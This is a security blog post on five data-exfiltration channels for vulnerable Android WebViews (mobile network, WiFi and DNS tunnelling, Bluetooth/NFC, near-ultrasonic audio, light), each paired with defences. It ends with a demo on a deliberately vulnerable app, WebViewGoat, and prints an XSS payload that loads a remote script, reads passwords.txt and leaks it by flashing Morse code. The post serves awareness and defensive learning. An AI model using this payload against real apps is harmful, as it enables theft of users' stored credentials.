Meetup Vulnerabilities: Escalation of Privilege and Redirection of Funds

The Top 5 Exfiltration Attacks on WebViews

WebViews are a huge advantage when it comes to portability. But at what cost? By allowing Web content to interact with native functions, a window of attack possibilities opens. Old versions of Android (until API 17) allowed Remote Code Execution when an attacker was able to abuse a JavaScript Interface. Although this vulnerability was fixed in recent API versions, such attacks can still be devastating. It just depends on how the JavaScript Interface is implemented. We did some research and determined that these are the top five exfiltration attacks on WebViews.

Gaining illicit access to mobile devices via bad WebView implementations is out of the scope of this blog post. Our goal is to raise awareness to the consequences of these exploitations in terms of information leakage, as several exfiltration techniques can be used to bypass security controls.

Exfiltration, also known as data extrusion, consists of an illicit data transfer using a covert channel, usually used for espionage or ransom.

In this blog post, we’ll describe the top five exfiltration attack scenarios for vulnerable WebView implementations, highlighting attack techniques and defense strategies.

1. Mobile Carrier Network

The majority of mobile devices are connected to a mobile carrier network. Only in very particular situations is there no need to make and receive calls.

By using these public networks, it is very difficult to detect data leakage. For instance, if an attacker gains access to critical files in the physical memory of the device, they can send its content using SMS, email or even a phone call. Audio exfiltration would require encoding in this case, but the particularities of these attacks will be covered later on.

In order to detect and prevent the exfiltration, software can be used to monitor access to critical files and stop the processes that try to read them. Another good approach is encrypting important files, email, notes, etc., and require specific software in the mobile device to open sensitive data.

But even when the device has these security measures or if it doesn’t have sensitive information, there is the possibility of information disclosure. If a malware has access to some input device, such as a camera or microphone, sensitive information can be recorded in real time and exfiltrated afterwards. In case of illicitly capturing the audio of an important meeting for instance, the detection of the attack is more difficult, once there is no reading of important files, and writing to disk can also be avoided.

Another possibility for gathering sensitive data without reading from the local disk is using cloud services that are configured in the device. If the mobile phone has client software configured to access cloud services, such as a remote disk drive for instance, it may be possible to be abused by malware and may lead to sensitive data being stolen. Because of all of these vectors for accessing data, enforcing extreme policies can be justifiable, like forbidding the use of mobile devices during meetings, obliging to encrypt all data and denying access to cloud services.

2. WiFi Network

With internet access through a local WiFi network, exfiltration has many more possible vectors. On the other hand, local WiFi can be monitored by detection systems, as IDS/IPS and DLP.

When these mechanisms are used, exfiltration with non-encrypted transfer protocols like FTP is immediately detected and blocked. Using SSL/TLS implementations, as recent messaging and social networks clients do, will succeed in most domestic environments. In contrast, corporate environments usually implement SSL/TLS inspection, which would stop the exfiltration.

To bypass detection mechanisms, encoding and encryption come in place. Encoding and encryption are often used by malware to exfiltrate information avoiding detection. And even when the attack is identified after the exfiltration, the forensic analysis is more difficult.

In order to fight these attacks, firewalls are used in conjunction with IDS/IPS, DLP and SSL/TLS inspection. This way, only a small amount of ports are open for communication with the internet (HTTP and HTTPS for example), and the IDS/IPS verifies if the traffic is identified as the expected protocol for the used port. To bypass a corporate scenario like this, the attacker can try to introduce a receiving service in the same LAN as the sender, thus avoiding the implemented network security controls. Of course, this requires local access to the facilities and physical network security vulnerabilities. To overcome all of these attack difficulties and security controls, several creative techniques are used. For instance, using normal and apparently legit HTTP/HTTPS and DNS internet traffic.

One exfiltration technique based on HTTP/HTTPS consists in converting data to binary and doing normal HTTP/HTTPS requests to a legit site that is not visited often. The key is using the web server cache and verifying the response headers related to server side caching. Each request to this page would be a “1”, and no request would be a “0”. The receiver needs to be coordinated with the sender and visit the legit site right after the sender does, in order to understand from the response headers whether the page has been visited by the receiver (which means a “1”) or not (“which means a ‘0’”). This technique is very slow, although different URLs can be used to gain performance.

As an alternative, a DNS approach for exfiltration would be much more effective.  One technique seen in the wild consists of having an attacker DNS server (receiver) that resolves names for an attacker domain. The sender encodes the data that is going to be exfiltrated and sends a DNS request to the attacker domain using the encoded data as a prefix, such as: “”. This request will be forwarded by the local DNS server to the attacker server, which will save all requests and store the leaked data. This DNS traffic is unlikely to be identified as malicious by the security devices. An interesting measure that could prevent these scenarios is whitelisting internet access, which means only allowing access to a list of well-known web sites.

3. Bluetooth and NFC

Earlier in this post, we referred mobile devices that where connected to a mobile carrier network or a domestic/corporate WiFi network. From this part of the post onward, only air gap situations are considered. Air gap is the concept of isolating systems or networks from unsecured networks, like the internet. In these scenarios, exfiltrating sensitive data by the network without being detected is very difficult. It requires physical access to systems or isolated networks to implant a receiver.

So, once again, creativity comes to play. There are several ways of exfiltrating data without using common TCP/IP communication, like NFC and Bluetooth.

NFC stands for near-field communication and is a wireless communication technology that, in typical implementations, only works between devices that distance less than 10cm from each other. It is well known because of its usage in the contactless payment systems. Using NFC to exfiltrate data can be effective if the attacker manages to stand very close to the device. For instance, if the receiving device is a mobile phone and the attacker manages to stand near the victim at the office or in a public place, they can place the device side by side with the victim’s mobile phone without looking suspicious. On the other hand, proximity increases the attacker’s risk of being caught. To increase the attack’s required physical distance, Bluetooth can be used.

Bluetooth is another well-known wireless technology used for communication between devices at small distances. But this technology can transmit between an open distance of 100m and provides higher transmission rate speeds than NFC. The advantages of NFC against Bluetooth are consuming less energy and don’t requiring pairing. A good way to prevent exfiltration with these technologies is avoiding the use of mobile devices that have Bluetooth and NFC functionality or physically disable these transmission cards.

4. Audio Frequencies

Audio frequencies are another way of exfiltrating data. By converting the data to binary or other code, the device speakers can be used to play different tunes (frequencies) representing different signals. But in order to avoid detection, using near-ultrasonic frequencies is a more effective approach.

A human being is able to identify frequencies between 20hz and 20Khz, in theory. But most adults are only able to hear frequencies under the 17Khz. Near-ultrasonic frequencies are the ones between 17Khz and 20Khz. Using these frequencies to send encoded data will not be noticed by the majority of human adults, but it will be perfectly understood by a sound-card or a microphone. For the exfiltration to work, the attacker has to plant a microphone near the victim’s mobile device so that it can capture the sound. Afterwards, the captured sound needs to be decoded with proper software.

Besides regular data encoding, spectrograms are also an option. These are a steganography technique that can be used to exfiltrate images. They are a visual representation of sound frequencies, so it is easier and faster to exfiltrate a big image with spectrograms (rather than using binary code, for example). It is also possible to visualize leaked images with regular audio software that has spectrogram visualization features. The spectrogram exfiltration can be made using near-ultrasonic frequencies as well. Some people can listen to near-ultrasonic frequencies, especially children, so there is also the possibility of combining the near-ultrasonic frequencies of the spectrogram with the frequencies of a real song. With this approach, the victim listens to the music and doesn’t understand that an exfiltration attack is taking place.

Instead of using the mobile device’s speakers, the exfiltration of data through audio frequencies can be achieved with the vibration motor as well. As the device vibrates, it produces audio frequencies that can be identified and decoded by a receiver. These techniques are very effective for small amounts of data but require that the attacker is near the victim during the attack.

5. Light

There are several components of mobile devices that can reproduce light. A camera flash, the screen itself, a IR blaster (infrared) or a notification led, to name a few, are all capable of producing light and can be used for data exfiltration.

Apart from being an effective way to exfiltrate in air gaps, light allows data transmission in long distances. With the use of a camera that has the ability to focus from far away, the light can be interpreted and decoded from hundreds of meters, depending on the light intensity, the camera, and the obstacles between them. There are also solutions for small distances that can be used inside an office, such as light sensors or cameras hidden in clothes, furniture, office supplies, etc.

A simple approach for converting and transmitting the data is using binary encoding. The light can be turned on for “1” and remain turned off for “0”. Another common encoding method is Morse code.  Although it only supports letters and numbers, the encoded data is smaller compared to simple binary. Non-binary codes can be used if the attacker is able to create different signals with the same light source. This is possible with the screen light and the camera flash and can be used to compress the encoded data. With the help of a light sensor on the receiver, the different signals are recognized and sent to decoding software.

The transmission rate depends on the amount of time that was defined for each signal. For human understanding, only slow transmission rates can be used. On other hand, a light sensor or camera can identify the different signals when the light is blinking beyond human perception, which will increase the transmission rate and lower the probability of detection of the exfiltration attack.

A vulnerable application called WebViewGoat was created to demonstrate exfiltration scenarios. It is publicly available so that people can simulate attacks and use it for learning and awareness. The application represents the work of someone that divided the development process in two stages and released the first version, trying to start earning money sooner.

WebViewGoat was designed to read a QRCode with the help of the mobile device camera. If the QRCode has a web link, it will open a web page inside a WebView without leaving the app, and this page uses an iframe to load and show the site of the QRCode link. The app works well and there are no signs of vulnerabilities for the common user. The following images are screenshots of the app reading a QRCode with the link

WebViewGoat - Your QR Code Brought You Here WebViewGoat - Read QR Code


In fact, there are several vulnerabilities. There is a reflected XSS vulnerability in the web page that is loaded by the WebView. There is also a JavaScript Interface that is available in the WebView and allows interaction with the camera flash and the memory card. The functions that control the camera flash were created, but the developer wasn’t able to use them the way he wanted. He/she wanted the camera flash to turn on during the QRCode reading, and turn off when the web page was loaded in the WebView. As he was having problems implementing this functionality, decided to leave the solution for the second development stage. He also postponed the reading of QRCodes from files functionality, even though he/she left functions in the code that read and write files to the memory card for future use.

In conclusion, the functions for camera flash control and file reading stayed in the code, and even though they are not being used, they are available in the WebView and are more than enough for an exfiltration attack using light as the mean of transmission. The following images show the JavaScript code vulnerable to XSS, and some functions that are available in the WebView through the JavaScript Interface “Android.”

JavaScript vulnerable to exploit         Functions to control the flash

To demonstrate a successful attack, a JavaScript file named codes.js was created and placed in a malicious server that is available from the Internet. This file contains functions able to encode data to Morse code. It also implements functionality to send the encoded data using the camera flash. Using the XSS vulnerability, this JavaScript file is included in the page. A file named passwords.txt is then read from the memory card and the exfiltration of the content of this file is achieved. For all this, the following payload can be used:'></iframe><script src=''></script><script>var aux=Android.readFile("passwords.txt");var lines=aux.split("\n");for (j=0;j<lines.length;j++){ sendMessage(lines[j]); Android.flashOff(2000); } </script>

The content of the passwords.txt file is “checkmarx” and “cx1234”. In the following video, the attack is demonstrated using slow speed for the light blinks, and is possible for a human to understand the leaked data without the need of a light sensor or decoding software.


This is part three of a four-part series. Read part 1:
Android WebView: Secure Coding Practices
 and part 2: JavaScript Attacks in WebViews, and part 4: Android WebView: Are Secure Coding Practices Being Followed?

Read the Complete Research on NFCdrip Now.


Preventing Data Exfiltration, 2017;
Perfect Data Exfiltration Demonstrated, 2016
20 Years of DNS Data Exfiltration: Why, How, and What’s Next?, 2017
BruCON 0x09 – Hacking invisibly and silently with light and sound – Matt Wixey, 2017
Air gap (Wikipedia), 2017
Near-field communication (Wikipedia), 2017

(This post was originally published on January 22, 2018.)

Jump to Category